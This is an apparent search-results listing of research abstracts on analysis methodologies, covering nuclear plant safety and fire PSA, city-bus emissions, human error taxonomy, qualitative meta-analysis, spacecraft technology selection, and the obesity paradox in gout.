    The aim in this paper is to contribute to the development of a research agenda for the comparative analysis of gender relations in Western Europe. Its focus is the clarification of the methodological and theoretical issues involved. Several different indices of gender inequality are assessed. It is argued that it is important to distinguish between the form and degree of patriarchy, rather than assuming that these are closely associated. Data from the EC and Scandinavia are used to illustrate...

  14. An analysis methodology for hot leg break mass and energy release

    International Nuclear Information System (INIS)

    Song, Jin Ho; Kwon, Young Min; Kim, Taek Mo; Chung, Hae Yong; Lee, Sang Jong

    1996-07-01

    An analysis methodology for the hot leg break mass and energy release is developed. For the blowdown period a modified CEFLASH-4A analysis is suggested. For the post-blowdown period a new computer model named COMET is developed. Differently from previous post-blowdown analysis model FLOOD3, COMET is capable of analyzing both cold leg and hot leg break cases. The cold leg break model is essentially same as that of FLOOD3 with some improvements. The analysis results by the newly proposed hot leg break model in the COMET is in the same trend as those observed in scaled-down integral experiment. And the analyses results for the UCN 3 and 4 by COMET are qualitatively and quantitatively in good agreement with those predicted by best-estimate analysis by using RELAP5/MOD3. Therefore, the COMET code is validated and can be used for the licensing analysis. 6 tabs., 82 figs., 9 refs. (Author)

  15. Significant aspects of the external event analysis methodology of the Jose Cabrera NPP PSA

    International Nuclear Information System (INIS)

    Barquin Duena, A.; Martin Martinez, A.R.; Boneham, P.S.; Ortega Prieto, P.

    1994-01-01

    This paper describes the following advances in the methodology for Analysis of External Events in the PSA of the Jose Cabrera NPP: In the Fire Analysis, a version of the COMPBRN3 CODE, modified by Empresarios Agrupados according to the guidelines of Appendix D of the NUREG/CR-5088, has been used. Generic cases were modelled and general conclusions obtained, applicable to fire propagation in closed areas. The damage times obtained were appreciably lower than those obtained with the previous version of the code. The Flood Analysis methodology is based on the construction of event trees to represent flood propagation dependent on the condition of the communication paths between areas, and trees showing propagation stages as a function of affected areas and damaged mitigation equipment. To determine temporary evolution of the flood area level, the CAINZO-EA code has been developed, adapted to specific plant characteristics. In both the Fire and Flood Analyses a quantification methodology has been adopted, which consists of analysing the damages caused at each stage of growth or propagation and identifying, in the Internal Events models, the gates, basic events or headers to which safe failure (probability 1) due to damages is assigned. (Author)

  16. Safety analysis methodology with assessment of the impact of the prediction errors of relevant parameters

    International Nuclear Information System (INIS)

    Galia, A.V.

    2011-01-01

    The best estimate plus uncertainty approach (BEAU) requires the use of extensive resources and therefore it is usually applied for cases in which the available safety margin obtained with a conservative methodology can be questioned. Outside the BEAU methodology, there is not a clear approach on how to deal with the issue of considering the uncertainties resulting from prediction errors in the safety analyses performed for licensing submissions. However, the regulatory document RD-310 mentions that the analysis method shall account for uncertainties in the analysis data and models. A possible approach is presented, that is simple and reasonable, representing just the author's views, to take into account the impact of prediction errors and other uncertainties when performing safety analysis in line with regulatory requirements. The approach proposes taking into account the prediction error of relevant parameters. Relevant parameters would be those plant parameters that are surveyed and are used to initiate the action of a mitigating system or those that are representative of the most challenging phenomena for the integrity of a fission barrier. Examples of the application of the methodology are presented involving a comparison between the results with the new approach and a best estimate calculation during the blowdown phase for two small breaks in a generic CANDU 6 station. The calculations are performed with the CATHENA computer code. (author)

  17. Methodology for the analysis of pollutant emissions from a city bus

    International Nuclear Information System (INIS)

    Armas, Octavio; Lapuerta, Magín; Mata, Carmen

    2012-01-01

    In this work a methodology is proposed for measurement and analysis of gaseous emissions and particle size distributions emitted by a diesel city bus during its typical operation under urban driving conditions. As test circuit, a passenger transportation line at a Spanish city was used. Different ways for data processing and representation were studied and, derived from this work, a new approach is proposed. The methodology was useful to detect the most important uncertainties arising during registration and processing of data derived from a measurement campaign devoted to determine the main pollutant emissions. A HORIBA OBS-1300 gas analyzer and a TSI engine exhaust particle spectrometer were used with 1 Hz frequency data recording. The methodology proposed allows for the comparison of results (in mean values) derived from the analysis of either complete cycles or specific categories (or sequences). The analysis by categories is demonstrated to be a robust and helpful tool to isolate the effect of the main vehicle parameters (relative fuel–air ratio and velocity) on pollutant emissions. It was shown that acceleration sequences have the highest contribution to the total emissions, whereas deceleration sequences have the least. (paper)

  18. A methodology for collection and analysis of human error data based on a cognitive model: IDA

    International Nuclear Information System (INIS)

    Shen, S.-H.; Smidts, C.; Mosleh, A.

    1997-01-01

    This paper presents a model-based human error taxonomy and data collection. The underlying model, IDA (described in two companion papers), is a cognitive model of behavior developed for analysis of the actions of nuclear power plant operating crew during abnormal situations. The taxonomy is established with reference to three external reference points (i.e. plant status, procedures, and crew) and four reference points internal to the model (i.e. information collected, diagnosis, decision, action). The taxonomy helps the analyst: (1) recognize errors as such; (2) categorize the error in terms of generic characteristics such as 'error in selection of problem solving strategies' and (3) identify the root causes of the error. The data collection methodology is summarized in post event operator interview and analysis summary forms. The root cause analysis methodology is illustrated using a subset of an actual event. Statistics, which extract generic characteristics of error prone behaviors and error prone situations are presented. Finally, applications of the human error data collection are reviewed. A primary benefit of this methodology is to define better symptom-based and other auxiliary procedures with associated training to minimize or preclude certain human errors. It also helps in design of control rooms, and in assessment of human error probabilities in the probabilistic risk assessment framework. (orig.)

  19. Methodology for the analysis of pollutant emissions from a city bus

    Science.gov (United States)

    Armas, Octavio; Lapuerta, Magín; Mata, Carmen

    2012-04-01

    In this work a methodology is proposed for measurement and analysis of gaseous emissions and particle size distributions emitted by a diesel city bus during its typical operation under urban driving conditions. As test circuit, a passenger transportation line at a Spanish city was used. Different ways for data processing and representation were studied and, derived from this work, a new approach is proposed. The methodology was useful to detect the most important uncertainties arising during registration and processing of data derived from a measurement campaign devoted to determine the main pollutant emissions. A HORIBA OBS-1300 gas analyzer and a TSI engine exhaust particle spectrometer were used with 1 Hz frequency data recording. The methodology proposed allows for the comparison of results (in mean values) derived from the analysis of either complete cycles or specific categories (or sequences). The analysis by categories is demonstrated to be a robust and helpful tool to isolate the effect of the main vehicle parameters (relative fuel-air ratio and velocity) on pollutant emissions. It was shown that acceleration sequences have the highest contribution to the total emissions, whereas deceleration sequences have the least.

  20. Development of the fire PSA methodology and the fire analysis computer code system

    International Nuclear Information System (INIS)

    Katsunori, Ogura; Tomomichi, Ito; Tsuyoshi, Uchida; Yusuke, Kasagawa

    2009-01-01

    Fire PSA methodology has been developed and was applied to NPPs in Japan for power operation and LPSD states. CDFs of preliminary fire PSA for power operation were the higher than that of internal events. Fire propagation analysis code system (CFAST/FDS Network) was being developed and verified thru OECD-PRISME Project. Extension of the scope for LPSD state is planned to figure out the risk level. In order to figure out the fire risk level precisely, the enhancement of the methodology is planned. Verification and validation of phenomenological fire propagation analysis code (CFAST/FDS Network) in the context of Fire PSA. Enhancement of the methodology such as an application of 'Electric Circuit Analysis' in NUREG/CR-6850 and related tests in order to quantify the hot-short effect precisely. Development of seismic-induced fire PSA method being integration of existing seismic PSA and fire PSA methods is ongoing. Fire PSA will be applied to review the validity of fire prevention and mitigation measures

  1. How to conduct a qualitative meta-analysis: Tailoring methods to enhance methodological integrity.

    Science.gov (United States)

    Levitt, Heidi M

    2018-05-01

    Although qualitative research has long been of interest in the field of psychology, meta-analyses of qualitative literatures (sometimes called meta-syntheses) are still quite rare. Like quantitative meta-analyses, these methods function to aggregate findings and identify patterns across primary studies, but their aims, procedures, and methodological considerations may vary. This paper explains the function of qualitative meta-analyses and their methodological development. Recommendations have broad relevance but are framed with an eye toward their use in psychotherapy research. Rather than arguing for the adoption of any single meta-method, this paper advocates for considering how procedures can best be selected and adapted to enhance a meta-study's methodological integrity. Through the paper, recommendations are provided to help researchers identify procedures that can best serve their studies' specific goals. Meta-analysts are encouraged to consider the methodological integrity of their studies in relation to central research processes, including identifying a set of primary research studies, transforming primary findings into initial units of data for a meta-analysis, developing categories or themes, and communicating findings. The paper provides guidance for researchers who desire to tailor meta-analytic methods to meet their particular goals while enhancing the rigor of their research.

  2. Analysis of Feedback processes in Online Group Interaction: a methodological model

    Directory of Open Access Journals (Sweden)

    Anna Espasa

    2013-06-01

    Full Text Available The aim of this article is to present a methodological model to analyze students' group interaction to improve their essays in online learning environments, based on asynchronous and written communication. In these environments teacher and student scaffolds for discussion are essential to promote interaction. One of these scaffolds can be the feedback. Research on feedback processes has predominantly focused on feedback design rather than on how students utilize feedback to improve learning. This methodological model fills this gap contributing to analyse the implementation of the feedback processes while students discuss collaboratively in a specific case of writing assignments. A review of different methodological models was carried out to define a framework adjusted to the analysis of the relationship of written and asynchronous group interaction, and students' activity and changes incorporated into the final text. The model proposed includes the following dimensions: 1 student participation 2 nature of student learning and 3 quality of student learning. The main contribution of this article is to present the methodological model and also to ascertain the model's operativity regarding how students incorporate such feedback into their essays.

  3. A methodology for spacecraft technology insertion analysis balancing benefit, cost, and risk

    Science.gov (United States)

    Bearden, David Allen

    Emerging technologies are changing the way space missions are developed and implemented. Technology development programs are proceeding with the goal of enhancing spacecraft performance and reducing mass and cost. However, it is often the case that technology insertion assessment activities, in the interest of maximizing performance and/or mass reduction, do not consider synergistic system-level effects. Furthermore, even though technical risks are often identified as a large cost and schedule driver, many design processes ignore effects of cost and schedule uncertainty. This research is based on the hypothesis that technology selection is a problem of balancing interrelated (and potentially competing) objectives. Current spacecraft technology selection approaches are summarized, and a Methodology for Evaluating and Ranking Insertion of Technology (MERIT) that expands on these practices to attack otherwise unsolved problems is demonstrated. MERIT combines the modern techniques of technology maturity measures, parametric models, genetic algorithms, and risk assessment (cost and schedule) in a unique manner to resolve very difficult issues including: user-generated uncertainty, relationships between cost/schedule and complexity, and technology "portfolio" management. While the methodology is sufficiently generic that it may in theory be applied to a number of technology insertion problems, this research focuses on application to the specific case of small (<500 kg) satellite design. Small satellite missions are of particular interest because they are often developed under rigid programmatic (cost and schedule) constraints and are motivated to introduce advanced technologies into the design. MERIT is demonstrated for programs procured under varying conditions and constraints such as stringent performance goals, not-to-exceed costs, or hard schedule requirements. MERIT'S contributions to the engineering community are its: unique coupling of the aspects of performance

  4. The Obesity Paradox in Recurrent Attacks of Gout in Observational Studies: Clarification and Remedy

    Science.gov (United States)

    Nguyen, Uyen-Sa D. T.; Zhang, Yuqing; Louie-Gao, Qiong; Niu, Jingbo; Felson, David T.; LaValley, Michael P.; Choi, Hyon K.

    2016-01-01

    Objective Obesity is strongly associated with incident gout risk; its association with risk of recurrent gout attacks has been null or weak, constituting an obesity paradox. We sought to demonstrate and overcome the methodologic issues associated with the obesity paradox for risk of recurrent gout attacks. Methods Using the MRFIT database, we decomposed the total effect of obesity into its direct and indirect (i.e., mediated) effects using marginal structural models. We also estimated the total effect of BMI change from baseline among incident gout patients. Results Of 11,816 gout-free subjects at baseline, we documented 408 incident gout cases, with 132 developing recurrent gout attacks over a 7-year follow-up. The adjusted odds ratio (OR) for incident gout among obese individuals was 2.6, while that for recurrent gout attacks among gout patients was 0.98 (i.e., the obesity paradox). These ORs correlated well with the ORs for the indirect and direct effects of obesity on risk of recurrent gout attacks (i.e., 2.83 and 0.98, respectively). Compared with no BMI change, the OR of losing vs. gaining >5% of baseline BMI was 0.61 and 1.60 for recurrent gout attacks, respectively (P for trend gout attacks is explained by the absence of the direct effect, which is often measured in conventional analyses and misinterpreted as the intended total effect of interest. In contrast, the BMI change analysis correctly estimated the intended total effect of BMI, and revealed a dose-response relationship. PMID:27331767

  5. Attacker Model Lab

    OpenAIRE

    2006-01-01

    tut quiz present Tutorial Quiz Presentation Interactive Media Element This interactive tutorial the two sub-classes of computer attackers: amateurs and professionals. It provides valuable insight into the nature of necessary protection measure for information assets. CS3600 Information Assurance: Introduction to Computer Security Course

  6. Transient Ischemic Attack

    Medline Plus

    Full Text Available ... major stroke. It's important to call 9-1-1 immediately for any stroke symptoms. Popular Topics TIA Cardiac Catheter Cholesterol Heart Attack Stent © 2018, American Heart Association, Inc. All rights reserved. Unauthorized use prohibited. The content in this ...

  7. Tracking and Analyzing Individual Distress Following Terrorist Attacks Using Social Media Streams.

    Science.gov (United States)

    Lin, Yu-Ru; Margolin, Drew; Wen, Xidao

    2017-08-01

    Risk research has theorized a number of mechanisms that might trigger, prolong, or potentially alleviate individuals' distress following terrorist attacks. These mechanisms are difficult to examine in a single study, however, because the social conditions of terrorist attacks are difficult to simulate in laboratory experiments and appropriate preattack baselines are difficult to establish with surveys. To address this challenge, we propose the use of computational focus groups and a novel analysis framework to analyze a social media stream that archives user history and location. The approach uses time-stamped behavior to quantify an individual's preattack behavior after an attack has occurred, enabling the assessment of time-specific changes in the intensity and duration of an individual's distress, as well as the assessment of individual and social-level covariates. To exemplify the methodology, we collected over 18 million tweets from 15,509 users located in Paris on November 13, 2015, and measured the degree to which they expressed anxiety, anger, and sadness after the attacks. The analysis resulted in findings that would be difficult to observe through other methods, such as that news media exposure had competing, time-dependent effects on anxiety, and that gender dynamics are complicated by baseline behavior. Opportunities for integrating computational focus group analysis with traditional methods are discussed. © 2017 Society for Risk Analysis.

  8. Network meta-analysis-highly attractive but more methodological research is needed

    Directory of Open Access Journals (Sweden)

    Singh Sonal

    2011-06-01

    Full Text Available Abstract Network meta-analysis, in the context of a systematic review, is a meta-analysis in which multiple treatments (that is, three or more are being compared using both direct comparisons of interventions within randomized controlled trials and indirect comparisons across trials based on a common comparator. To ensure validity of findings from network meta-analyses, the systematic review must be designed rigorously and conducted carefully. Aspects of designing and conducting a systematic review for network meta-analysis include defining the review question, specifying eligibility criteria, searching for and selecting studies, assessing risk of bias and quality of evidence, conducting a network meta-analysis, interpreting and reporting findings. This commentary summarizes the methodologic challenges and research opportunities for network meta-analysis relevant to each aspect of the systematic review process based on discussions at a network meta-analysis methodology meeting we hosted in May 2010 at the Johns Hopkins Bloomberg School of Public Health. Since this commentary reflects the discussion at that meeting, it is not intended to provide an overview of the field.

  9. Development of a systematic methodology to select hazard analysis techniques for nuclear facilities

    Energy Technology Data Exchange (ETDEWEB)

    Vasconcelos, Vanderley de; Reis, Sergio Carneiro dos; Costa, Antonio Carlos Lopes da [Centro de Desenvolvimento da Tecnologia Nuclear (CDTN/CNEN-MG), Belo Horizonte, MG (Brazil)]. E-mails: vasconv@cdtn.br; reissc@cdtn.br; aclc@cdtn.br; Jordao, Elizabete [Universidade Estadual de Campinas (UNICAMP), SP (Brazil). Faculdade de Engenharia Quimica]. E-mail: bete@feq.unicamp.br

    2008-07-01

    In order to comply with licensing requirements of regulatory bodies risk assessments of nuclear facilities should be carried out. In Brazil, such assessments are part of the Safety Analysis Reports, required by CNEN (Brazilian Nuclear Energy Commission), and of the Risk Analysis Studies, required by the competent environmental bodies. A risk assessment generally includes the identification of the hazards and accident sequences that can occur, as well as the estimation of the frequencies and effects of these unwanted events on the plant, people, and environment. The hazard identification and analysis are also particularly important when implementing an Integrated Safety, Health, and Environment Management System following ISO 14001, BS 8800 and OHSAS 18001 standards. Among the myriad of tools that help the process of hazard analysis can be highlighted: CCA (Cause- Consequence Analysis); CL (Checklist Analysis); ETA (Event Tree Analysis); FMEA (Failure Mode and Effects Analysis); FMECA (Failure Mode, Effects and Criticality Analysis); FTA (Fault Tree Analysis); HAZOP (Hazard and Operability Study); HRA (Human Reliability Analysis); Pareto Analysis; PHA (Preliminary Hazard Analysis); RR (Relative Ranking); SR (Safety Review); WI (What-If); and WI/CL (What-If/Checklist Analysis). The choice of a particular technique or a combination of techniques depends on many factors like motivation of the analysis, available data, complexity of the process being analyzed, expertise available on hazard analysis, and initial perception of the involved risks. This paper presents a systematic methodology to select the most suitable set of tools to conduct the hazard analysis, taking into account the mentioned involved factors. Considering that non-reactor nuclear facilities are, to a large extent, chemical processing plants, the developed approach can also be applied to analysis of chemical and petrochemical plants. The selected hazard analysis techniques can support cost

  10. Development of a systematic methodology to select hazard analysis techniques for nuclear facilities

    International Nuclear Information System (INIS)

    Vasconcelos, Vanderley de; Reis, Sergio Carneiro dos; Costa, Antonio Carlos Lopes da; Jordao, Elizabete

    2008-01-01

    In order to comply with licensing requirements of regulatory bodies risk assessments of nuclear facilities should be carried out. In Brazil, such assessments are part of the Safety Analysis Reports, required by CNEN (Brazilian Nuclear Energy Commission), and of the Risk Analysis Studies, required by the competent environmental bodies. A risk assessment generally includes the identification of the hazards and accident sequences that can occur, as well as the estimation of the frequencies and effects of these unwanted events on the plant, people, and environment. The hazard identification and analysis are also particularly important when implementing an Integrated Safety, Health, and Environment Management System following ISO 14001, BS 8800 and OHSAS 18001 standards. Among the myriad of tools that help the process of hazard analysis can be highlighted: CCA (Cause- Consequence Analysis); CL (Checklist Analysis); ETA (Event Tree Analysis); FMEA (Failure Mode and Effects Analysis); FMECA (Failure Mode, Effects and Criticality Analysis); FTA (Fault Tree Analysis); HAZOP (Hazard and Operability Study); HRA (Human Reliability Analysis); Pareto Analysis; PHA (Preliminary Hazard Analysis); RR (Relative Ranking); SR (Safety Review); WI (What-If); and WI/CL (What-If/Checklist Analysis). The choice of a particular technique or a combination of techniques depends on many factors like motivation of the analysis, available data, complexity of the process being analyzed, expertise available on hazard analysis, and initial perception of the involved risks. This paper presents a systematic methodology to select the most suitable set of tools to conduct the hazard analysis, taking into account the mentioned involved factors. Considering that non-reactor nuclear facilities are, to a large extent, chemical processing plants, the developed approach can also be applied to analysis of chemical and petrochemical plants. The selected hazard analysis techniques can support cost

  11. 3-Dimensional Methodology for the Control Rod Ejection Accident Analysis Using UNICORN{sup TM}

    Energy Technology Data Exchange (ETDEWEB)

    Jang, Chan-su; Um, Kil-sup; Ahn, Dawk-hwan [Korea Nuclear Fuel Company, Taejon (Korea, Republic of); Kim, Yo-han; Sung, Chang-kyung [KEPRI, Taejon (Korea, Republic of); Song, Jae-seung [Korea Atomic Energy Research Institute, Taejon (Korea, Republic of)

    2006-07-01

    The control rod ejection accident has been analyzed with STRIKIN-II code using the point kinetics model coupled with conservative factors to address the three dimensional aspects. This may result in a severe transient with very high fuel enthalpy deposition. KNFC, under the support of KEPRI and KAERI, is developing 3-dimensional methodology for the rod ejection accident analysis using UNICORNTM (Unified Code of RETRAN, TORC and MASTER). For this purpose, 3-dimensional MASTER-TORC codes, which have been combined with the dynamic-link library by KAERI, are used in the transient analysis of the core and RETRAN code is used to estimate the enthalpy deposition in the hot rod.

  12. Methodology for repeated load analysis of composite structures with embedded magnetic microwires

    Directory of Open Access Journals (Sweden)

    K. Semrád

    2017-01-01

    Full Text Available The article processes issue of strength of cyclically loaded composite structures with the possibility of contactless stress measuring inside a material. For this purpose a contactless tensile stress sensor using improved induction principle based on the magnetic microwires embedded in the composite structure has been developed. The methodology based on the E-N approach was applied for the analysis of the repeated load of the wing hinge connection, including finite element method (FEM fatigue strength analysis. The results proved that composites in comparison with the metal structures offer significant weight reduction of the small aircraft construction, whereas the required strength, stability and lifetime of the components are remained.

  13. 3-Dimensional Methodology for the Control Rod Ejection Accident Analysis Using UNICORNTM

    International Nuclear Information System (INIS)

    Jang, Chan-su; Um, Kil-sup; Ahn, Dawk-hwan; Kim, Yo-han; Sung, Chang-kyung; Song, Jae-seung

    2006-01-01

    The control rod ejection accident has been analyzed with STRIKIN-II code using the point kinetics model coupled with conservative factors to address the three dimensional aspects. This may result in a severe transient with very high fuel enthalpy deposition. KNFC, under the support of KEPRI and KAERI, is developing 3-dimensional methodology for the rod ejection accident analysis using UNICORNTM (Unified Code of RETRAN, TORC and MASTER). For this purpose, 3-dimensional MASTER-TORC codes, which have been combined with the dynamic-link library by KAERI, are used in the transient analysis of the core and RETRAN code is used to estimate the enthalpy deposition in the hot rod

  14. Statistical trend analysis methodology for rare failures in changing technical systems

    International Nuclear Information System (INIS)

    Ott, K.O.; Hoffmann, H.J.

    1983-07-01

    A methodology for a statistical trend analysis (STA) in failure rates is presented. It applies primarily to relatively rare events in changing technologies or components. The formulation is more general and the assumptions are less restrictive than in a previously published version. Relations of the statistical analysis and probabilistic assessment (PRA) are discussed in terms of categorization of decisions for action following particular failure events. The significance of tentatively identified trends is explored. In addition to statistical tests for trend significance, a combination of STA and PRA results quantifying the trend complement is proposed. The STA approach is compared with other concepts for trend characterization. (orig.)

  15. A rigorous methodology for development and uncertainty analysis of group contribution based property models

    DEFF Research Database (Denmark)

    Frutiger, Jerome; Abildskov, Jens; Sin, Gürkan

    ) weighted-least-square regression. 3) Initialization of estimation by use of linear algebra providing a first guess. 4) Sequential parameter and simultaneous GC parameter by using of 4 different minimization algorithms. 5) Thorough uncertainty analysis: a) based on asymptotic approximation of parameter...... covariance matrix b) based on boot strap method. Providing 95%-confidence intervals of parameters and predicted property. 6) Performance statistics analysis and model application. The application of the methodology is shown for a new GC model built to predict lower flammability limit (LFL) for refrigerants...... their credibility and robustness in wider industrial and scientific applications....

  16. Case-Crossover Analysis of Air Pollution Health Effects: A Systematic Review of Methodology and Application

    Science.gov (United States)

    Carracedo-Martínez, Eduardo; Taracido, Margarita; Tobias, Aurelio; Saez, Marc; Figueiras, Adolfo

    2010-01-01

    Background Case-crossover is one of the most used designs for analyzing the health-related effects of air pollution. Nevertheless, no one has reviewed its application and methodology in this context. Objective We conducted a systematic review of case-crossover (CCO) designs used to study the relationship between air pollution and morbidity and mortality, from the standpoint of methodology and application. Data sources and extraction A search was made of the MEDLINE and EMBASE databases. Reports were classified as methodologic or applied. From the latter, the following information was extracted: author, study location, year, type of population (general or patients), dependent variable(s), independent variable(s), type of CCO design, and whether effect modification was analyzed for variables at the individual level. Data synthesis The review covered 105 reports that fulfilled the inclusion criteria. Of these, 24 addressed methodological aspects, and the remainder involved the design’s application. In the methodological reports, the designs that yielded the best results in simulation were symmetric bidirectional CCO and time-stratified CCO. Furthermore, we observed an increase across time in the use of certain CCO designs, mainly symmetric bidirectional and time-stratified CCO. The dependent variables most frequently analyzed were those relating to hospital morbidity; the pollutants most often studied were those linked to particulate matter. Among the CCO-application reports, 13.6% studied effect modification for variables at the individual level. Conclusions The use of CCO designs has undergone considerable growth; the most widely used designs were those that yielded better results in simulation studies: symmetric bidirectional and time-stratified CCO. However, the advantages of CCO as a method of analysis of variables at the individual level are put to little use. PMID:20356818

  17. Risk of stroke and cardiovascular events after ischemic stroke or transient ischemic attack in patients with type 2 diabetes or metabolic syndrome: secondary analysis of the Stroke Prevention by Aggressive Reduction in Cholesterol Levels (SPARCL) trial

    DEFF Research Database (Denmark)

    Callahan, Alfred; Amarenco, Pierre; Goldstein, Larry B

    2011-01-01

    To perform a secondary analysis of the Stroke Prevention by Aggressive Reduction in Cholesterol Levels (SPARCL) trial, which tested the effect of treatment with atorvastatin in reducing stroke in subjects with a recent stroke or transient ischemic attack, to explore the effects of treatment...

  18. Blocking of Brute Force Attack

    OpenAIRE

    M.Venkata Krishna Reddy

    2012-01-01

    A common threat Web developers face is a password-guessing attack known as a brute-force attack. A brute-force attack is an attempt to discover a password by systematically trying every possible combination of letters, numbers, and symbols until you discover the one correct combination that works. If your Web site requires user authentication, you are a good target for a brute-force attack. An attacker can always discover a password through a brute-force attack, but the downside is that it co...

  19. Performance analysis and implementation of proposed mechanism for detection and prevention of security attacks in routing protocols of vehicular ad-hoc network (VANET

    Directory of Open Access Journals (Sweden)

    Parul Tyagi

    2017-07-01

    Full Text Available Next-generation communication networks have become widely popular as ad-hoc networks, broadly categorized as the mobile nodes based on mobile ad-hoc networks (MANET and the vehicular nodes based vehicular ad-hoc networks (VANET. VANET is aimed at maintaining safety to vehicle drivers by begin autonomous communication with the nearby vehicles. Each vehicle in the ad-hoc network performs as an intelligent mobile node characterized by high mobility and formation of dynamic networks. The ad-hoc networks are decentralized dynamic networks that need efficient and secure communication requirements due to the vehicles being persistently in motion. These networks are more susceptible to various attacks like Warm Hole attacks, denial of service attacks and Black Hole Attacks. The paper is a novel attempt to examine and investigate the security features of the routing protocols in VANET, applicability of AODV (Ad hoc On Demand protocol to detect and tackle a particular category of network attacks, known as the Black Hole Attacks. A new algorithm is proposed to enhance the security mechanism of AODV protocol and to introduce a mechanism to detect Black Hole Attacks and to prevent the network from such attacks in which source node stores all route replies in a look up table. This table stores the sequences of all route reply, arranged in ascending order using PUSH and POP operations. The priority is calculated based on sequence number and discard the RREP having presumably very high destination sequence number. The result show that proposed algorithm for detection and prevention of Black Hole Attack increases security in Intelligent Transportation System (ITS and reduces the effect of malicious node in the VANET. NCTUNs simulator is used in this research work.

  20. Ruling the Commons. Introducing a new methodology for the analysis of historical commons

    Directory of Open Access Journals (Sweden)

    Tine de Moor

    2016-10-01

    Full Text Available Despite significant progress in recent years, the evolution of commons over the long run remains an under-explored area within commons studies. During the last years an international team of historians have worked under the umbrella of the Common Rules Project in order to design and test a new methodology aimed at advancing our knowledge on the dynamics of institutions for collective action – in particular commons. This project aims to contribute to the current debate on commons on three different fronts. Theoretically, it explicitly draws our attention to issues of change and adaptation in the commons – contrasting with more static analyses. Empirically, it highlights the value of historical records as a rich source of information for longitudinal analysis of the functioning of commons. Methodologically, it develops a systematic way of analyzing and comparing commons’ regulations across regions and time, setting a number of variables that have been defined on the basis of the “most common denominators” in commons regulation across countries and time periods. In this paper we introduce the project, describe our sources and methodology, and present the preliminary results of our analysis.